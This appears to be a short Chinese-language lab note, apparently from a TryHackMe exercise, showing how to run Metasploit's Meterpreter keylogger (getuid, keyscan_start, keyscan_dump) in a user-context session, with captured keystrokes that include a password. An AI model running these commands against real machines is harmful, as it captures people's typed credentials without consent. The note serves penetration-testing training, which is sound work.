:::info

  • 凭证管理:
  • 键盘记录:

:::

键盘记录

MSF 中有一个内置的键盘记录器,我们可以使用该工具却提取用户的击键。

同时应当记住我们应该在具有用户上下文的 SHELL 中进行运行

确定目标上下文:

  1. meterpreter\>getuid
  2. Server username: THMSERVER1\trevor.local

准备键盘记录器:

  1. meterpreter\>keyscan_start
  2. Starting the keystroke sniffer ...

等待几分钟执行:

  1. meterpreter\>keyscan_dump
  2. Dumping captured keystrokes...
  3. keep<CR>
  4. <Shift>Passwordpasswordpassword<CR>

键盘记录